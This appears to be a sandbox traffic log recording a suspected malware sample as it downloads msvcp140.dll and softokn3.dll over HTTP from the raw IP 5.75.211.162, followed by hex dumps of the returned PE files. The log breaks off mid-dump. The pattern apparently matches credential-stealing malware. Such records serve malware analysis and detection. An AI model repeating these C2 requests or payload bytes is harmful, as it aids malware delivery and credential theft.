2024-09-25 16:00:41 UTC	16384	IN	Data Raw: 10 b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:00:42 UTC	197	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-25 16:00:43 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 16:00:43 GMT Content-Type: application/octet-stream Content-Length: 450024 Connection: close Last-Modified: Wednesday, 25-Sep-2024 16:00:43 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-25 16:00:43 UTC	16121	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-09-25 16:00:43 UTC	16384	IN	Data Raw: 00 72 00 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 Data Ascii: r-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mn
2024-09-25 16:00:43 UTC	16384	IN	Data Raw: 00 00 00 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 Data Ascii: x{\|L@DX}0}}M@4}0}}4M@tXM}0}}XM
2024-09-25 16:00:43 UTC	16384	IN	Data Raw: 18 d9 00 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]ED{nt]B]
2024-09-25 16:00:43 UTC	16384	IN	Data Raw: 6a 03 f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 Data Ascii: jatAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
2024-09-25 16:00:43 UTC	16384	IN	Data Raw: 85 c0 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 Data Ascii: uAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jj
2024-09-25 16:00:43 UTC	16384	IN	Data Raw: f0 51 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e Data Ascii: QVE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WEN
2024-09-25 16:00:43 UTC	16384	IN	Data Raw: e8 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 Data Ascii: u;t:]jYMS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4
2024-09-25 16:00:43 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 Data Ascii: UQEVuF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv
2024-09-25 16:00:43 UTC	16384	IN	Data Raw: f6 e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:00:44 UTC	197	OUT	GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-25 16:00:44 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 16:00:44 GMT Content-Type: application/octet-stream Content-Length: 257872 Connection: close Last-Modified: Wednesday, 25-Sep-2024 16:00:44 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-25 16:00:44 UTC	16121	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-09-25 16:00:45 UTC	16384	IN	Data Raw: 7d 08 c7 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 Data Ascii: }jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E0=(tM1(
2024-09-25 16:00:45 UTC	16384	IN	Data Raw: 8b 40 04 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 Data Ascii: @EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGP
2024-09-25 16:00:45 UTC	16384	IN	Data Raw: f9 02 10 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
2024-09-25 16:00:45 UTC	16384	IN	Data Raw: 85 c0 0f 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 Data Ascii: 0{C!=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!
2024-09-25 16:00:45 UTC	16384	IN	Data Raw: 5e 5f 5b 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 Data Ascii: ^_[]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=P
2024-09-25 16:00:45 UTC	16384	IN	Data Raw: 74 77 8b 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 Data Ascii: twu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWSut&uGZ
2024-09-25 16:00:45 UTC	16384	IN	Data Raw: 8b 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 Data Ascii: 7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
2024-09-25 16:00:45 UTC	16384	IN	Data Raw: 00 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff Data Ascii: @]]USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
2024-09-25 16:00:45 UTC	16384	IN	Data Raw: eb e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 